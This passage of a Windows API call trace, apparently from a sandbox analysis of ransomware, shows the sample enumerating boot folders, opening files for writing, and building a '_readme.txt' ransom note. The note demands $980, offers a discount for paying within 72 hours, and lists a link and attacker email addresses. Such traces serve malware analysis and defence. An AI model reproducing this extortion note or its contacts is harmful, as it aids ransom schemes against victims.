Flags=0x0, Size=0x820) returned 0x3b16180 [0201.525] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.525] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.525] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.525] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.525] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0201.525] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.526] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0201.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.526] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0201.526] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.527] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0201.527] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.528] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.528] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.529] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0201.530] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.530] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.530] PathFindFileNameW (pszPath="") returned="" [0201.530] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.530] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.530] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.530] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.531] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0201.531] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0201.531] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.531] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.531] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.531] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.532] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.532] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.532] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0201.532] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.532] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.532] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.532] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.532] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.534] HeapFree (in: hHeap=0x2c0000, 